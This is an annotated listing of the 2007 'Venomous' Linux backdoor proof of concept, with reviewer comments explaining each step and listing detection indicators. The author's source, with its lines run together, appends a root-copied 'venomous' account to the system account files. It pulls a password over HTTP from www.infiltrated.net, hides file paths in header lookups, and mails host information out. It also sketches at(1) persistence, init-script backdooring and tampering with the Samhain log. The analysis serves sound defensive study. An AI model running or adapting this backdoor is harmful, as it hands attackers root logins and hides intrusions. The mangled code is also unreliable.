# NOTE(review): this page is the "Venomous" Linux backdoor PoC (J. Oquendo,
# 2007).  It is kept as a sample for detection work, not as something to run.
# Do not execute it: it (1) appends a new account named "venomous" to the
# system account files, (2) fetches that account's password field over plain
# HTTP from a host the author controls, and (3) e-mails host information to
# an address typed at a prompt.  Whoever runs it (as root -- it has to be, to
# append to those files) hands a login on the box to whoever controls
# www.infiltrated.net, or to anyone who can tamper with that unauthenticated
# HTTP fetch.
#
# The listing has also lost its line structure in extraction.  The first line
# below opens with "# !/bin/sh" (with the space it is not even a valid shebang)
# and never breaks, so as pasted the whole of it -- shebang, rant and every
# command -- is ONE comment and does nothing.  The two lines after it each
# open with an un-commented fragment of the author's prose that a shell would
# try to run as a command.  The statements are annotated here in the order
# they appear; the line breaks are deliberately not restored.
#
# Commands buried in the first line (values that depend on the exact header
# revision are hedged, not asserted):
#   happy=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
#   days=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`
#       Two file paths are pulled out of C header files (line 59 of paths.h,
#       field 3 with quotes stripped; line 74 of sysexits.h, field 8 with
#       commas stripped) instead of being written literally.  The later
#       ">> $days" / ">> $happy" appends of colon-separated account records
#       show they are meant to be the passwd/shadow databases; which is which,
#       and whether those line numbers still match current glibc headers,
#       cannot be confirmed from the script alone -- TODO confirm against the
#       headers of a 2007-era distribution.  The indirection looks like an
#       attempt to keep strings such as "/etc/passwd" out of the file so a
#       naive grep of the script finds nothing.
#   guitar=`wget -qO - http://www.infiltrated.net/guitar|sed -n '1p'`
#       Downloads the password field for the new account (first line of the
#       response) over unauthenticated HTTP.  The header comment claims the
#       matching password is "password".  Egress to this URL is an indicator.
#   sed -n '1p' $happy|awk -F ":" 'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2' >> $days
#   sed -n '1p' $days|sed 's/[^:]*:/venomous:/'|awk -vguitar=$guitar -F ":" 'BEGIN{OFS=":"}{$2='guitar'}2' >> $happy
#       Copies the FIRST record of each file (root's on a stock system),
#       rewrites the name to "venomous", blanks or fills the password field,
#       and appends the result to the OTHER file.  Note the first awk program
#       prints twice -- rule "1" fires before field 2 is blanked, rule "2"
#       after -- so two "venomous" records land in $days, one still carrying
#       the source record's original second field.  The second pipeline sets
#       field 2 to the downloaded value ($2=guitar, passed with -v) and appends
#       one record to $happy.  The intent is a second account carrying root's
#       fields; because each appended record keeps the column layout of the
#       file it was copied FROM, whether the result actually logs in as uid 0
#       depends on how the login stack reads the mismatched fields -- the
#       script does not check, it only asserts.
#   what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'`
#   who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, ""){print $4" -a"}'`
#   echo "Enter your email address" ; read ans ; where=$ans
#   $who | $what $where
#       Same header trick for two command names: $who is run with "-a" and its
#       output is piped to $what with the typed address as its argument.  The
#       shape (prompt for an e-mail address, output piped to a command taking
#       that address) suggests a host-enumeration command feeding a mailer,
#       but the actual names depend on those header lines -- TODO confirm.
#       Nothing is quoted and the address is not validated.
# !/bin/sh # Venomous # Linux PoC backdoor keeper... # http://www.infiltrated.net/ubuntuDestruction.php # J. Oquendo (c) 05/09/2007 # Analogy... # Grandma needs a gun to go hunting for rabbits. She buys herself a # functional .22 (Windows *Anything*) in order to get food. Another # hunter who sees her offers her a bazooka (Anything *Nix) in order # for her get food. Oh the mess she will make. She doesn't need it # as her .22 will function just fine and certainly using the bazooka # will make a mess for one and she won't understand the power the # bazooka has until its too late. The hunter who gave her the bazooka? # They did it out of a good heart thinking if they gave her a bigger # gun, she would surely get something... They never took the time to # look at a bigger picture: "If I give this woman the bazooka, she # *really* isn't capable of handling it and will likely cause an # accident..." # If you have to ask you shouldn't run this password for venomous # is password happy=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h` days=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h` guitar=`wget -qO - http://www.infiltrated.net/guitar|sed -n '1p'` sed -n '1p' $happy|awk -F ":" 'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2' >> $days sed -n '1p' $days|sed 's/[^:]*:/venomous:/'|awk -vguitar=$guitar -F ":" 'BEGIN{OFS=":"}{$2='guitar'}2' >> $happy what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'` who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, ""){print $4" -a"}'` echo "Enter your email address" ; read ans ; where=$ans $who | $what $where # Ugly method too keep a rootaccount Follows... For those not in the know... # Venomous was an idea made to prove a point, not give script kiddiots another # tool to be morons with. Instead of ruining things, how about solving... # Instead of naysaying... Prove me wrong # Pick a ranDumb file in /usr/includes/ then create the same backdoor on the # system using this filename. 
# NOTE(review): the next line opens with an un-commented fragment ("Do
# something sneaky on your own to place this"); a shell would look for a
# command named "Do".  Everything after its first "#" is comment text, and the
# commands inside it are reached only if the line breaks are restored:
#   random=`date|awk -F : '{print $3}'|awk '{print $1}'`
#       Seconds field of `date` (the first word of the third ':'-separated
#       field), i.e. a value 00-59.
#   echo $random > /tmp/secCommand
#       Predictable, world-readable temp file name -- an indicator on its own.
#   sad=`awk '{print "ls /usr/include|sed -n '\''"$1"p'\''"}' /tmp/secCommand|sed -n '1p'`
#   filename=`echo $sad|sh|awk -F . '{print $1}'`
#       Builds and runs "ls /usr/include|sed -n Np" to pick the Nth header
#       name and strips its extension (a seconds value of 00 gives sed the
#       invalid address 0, so $filename is empty roughly once a minute).
#   rm /tmp/secCommand
#   at now + 30 days $filename
#       Hands the chosen name to at(1) as part of the time spec.  at takes its
#       job from stdin (or -f), not from a trailing word, so as written this
#       should fail with a garbled-time error rather than schedule anything;
#       the author says the persistence step was left incomplete on purpose.
#       The commented-out "Stupidities" that follow describe the intended
#       finishing moves -- editing every /etc/init.d/* with perl -pi to launch
#       $filename, base64-wrapping a second download of the script, and
#       rewriting /var/log/samhain_log to hide the name -- none of which is
#       active in this listing.
#
# Detection notes for the defender reading this: watch for appends to the
# passwd/shadow files that do not go through useradd/passwd (auditd write
# watches on both), a second uid-0 account or the literal name "venomous",
# unexpected at(1) jobs (atq / the at spool), a file /tmp/secCommand,
# outbound HTTP to www.infiltrated.net, and unexplained edits to init scripts
# or integrity-checker logs.
Do something sneaky on your own to place this # file on a startup I could show you, but then I would have to kill -9 you # Note the location... Highly doubtable to remove an actual include file # unless some stupid admin did something really dumb... Before someone mouths # around via e-mail... I could have written this all inclusively but I chose # not to for obvious reasons... random=`date|awk -F : '{print $3}'|awk '{print $1}'` echo $random > /tmp/secCommand sad=`awk '{print "ls /usr/include|sed -n '\''"$1"p'\''"}' /tmp/secCommand|sed -n '1p'` filename=`echo $sad|sh|awk -F . '{print $1}'` rm /tmp/secCommand # Rinse and repeat 30 days from now... at now + 30 days $filename # Stupidities # Wanna backdoor every startup script? Try something like who knows... # chmod +x $filename # echo "perl -pi -e 's/Starting \$prog: \"/Starting \$prog: \" $filename/g' /etc/init.d/*"|sh # Pseudocrypted... # wget -qO - www.infiltrated.net/scripts/venomous|\ # python -c "import sys; print sys.stdin.read().encode('base64')" > $filename # Add your own decode shit after this line # Wanna hide your entries in Samhain? # and uncomment the line below # awk -vfilename=$filename '{print "perl -pi -e '\''s/'$filename'/samhain/g'\''"}' /var/log/samhain_log|sh # Step by step # random=`date|awk -F : '{print $3}'|awk '{print $1}'` # Get the second # echo $random > /tmp/secCommand # Store that number temporarily # sad=`awk '{print "ls /usr/include|sed -n '\''"$1"p'\''"}' /tmp/secCommand|sed -n '1p'` # Print out the file based on that number. ls will show a list of file, what # follows will number the lines and pull out the number stored in the # temporary file. # rm /tmp/secCommand # Remove the temporary number # filename=`echo $sad|sh|awk -F . '{print $1}'` # duplicate the file from the commands above... # Now of course I could have modified this to replicate any one of the files # on startup but again... PoC ... The naysayers will ramble on about "You're # out of your mind..." Am I? 
# NOTE(review): the last line likewise opens with an un-commented fragment
# ("I've given you the PoC's ..."; the two apostrophes pair up, so a shell
# would look for a command literally named "Ive given you the PoCs").  The
# rest is the author's closing argument and contains no code.  Its one
# security-relevant statement is the claim that a variant which evades
# Samhain/Tripwire exists but is not published -- treat that as unverified.
I've given you the PoC's what more do you want... # Ubuntu or any Linux for the lowly home user is a horrible idea... # And AGAIN before someone fires off "I would see the URL and that's a dead # giveaway!" ... Look, I'm trying to make a point here... I "could have" # a functioning backdoor undetectable to most integrity checkers, Samhain, # Tripwire etc., but why should I disclose this anywhere. It's not in the # best interest of anyone to do so... Don't bother asking for it via email # because it's not public and will never be... # This again... Was to prove a point to the naysayers who this shit doesn't # happen... Keep dreaming. Its only a matter of time before you guys go # Goo Goo about getting Linux for Idjits off the ground, but its a horrible # mistake in the making # For those stating "I don't run as root you loser boo hoo..." Get a grip # ever hear of escalation...